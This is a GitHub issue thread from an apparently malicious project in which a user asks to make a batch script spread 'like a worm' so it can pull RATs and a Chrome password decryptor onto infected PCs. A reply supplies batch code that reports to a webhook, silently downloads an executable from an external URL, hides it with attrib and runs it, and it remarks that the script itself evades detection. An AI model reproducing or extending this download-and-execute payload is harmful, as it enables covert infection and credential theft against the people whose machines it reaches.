Make it like a worm (if possible) #2
Comments
|
Exactly. The script doesn't get detected itself, but the files downloaded will be detected as of now if we use external EXE's that show the passwords. You can easily modify the batch file to download files, just enable recurring and set the update URL. Then when you want it to download and run something just add this to the batch file. set "vpath="
set "webhook="
cd %vpath%
...
:: PAYLOAD - REMOVE GOTO IF YOU WANT THE SCRIPT TO DOWNLOAD AND RUN A FILE SOMEWHERE
:: ----------------------------------------------------------------------------------
goto skipcustomdownload
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Downloading and starting a custom file from\n%customdownloadurl% to %vpath%\%customfilename%```\"}" %webhook%
set "customdownloadurl=https://external.ext/file.exe"
set "customfilename=c.exe"
IF EXIST "%customfilename%" GOTO waitloop4
curl --silent -L --fail "%customdownloadurl%" -o "%customfilename%"
>NUL attrib "%vpath%\%customfilename%" +h
:waitloop4
IF EXIST "%customfilename%" GOTO waitloopend4
timeout /t 5 /nobreak > NUL
:waitloopend4
2> NUL start "%customfilename%"
:skipcustomdownload
... |
Repository owner
locked as resolved and limited conversation to collaborators
Jul 28, 2021
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Yes, make it like a worm, so you can download further files into the affected PC such as RAT and like discussed in DMs before, a program that decrypt chrome cached password files on the local computer itself
the cost may be that it gets detected
The text was updated successfully, but these errors were encountered: